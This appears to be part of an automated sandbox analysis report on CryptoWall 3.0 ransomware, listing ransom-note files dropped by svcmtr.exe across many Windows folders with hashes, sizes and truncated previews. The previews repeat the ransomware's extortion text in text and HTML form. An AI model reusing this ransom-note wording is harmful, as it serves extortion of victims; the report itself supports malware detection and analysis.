                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Adobe\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Adobe\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft Help\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft Help\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Assistance\Client\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Assistance\Client\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Assistance\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Assistance\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\DSS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Crypto\DSS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\Keys\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Crypto\Keys\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Crypto\PCPKSP\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
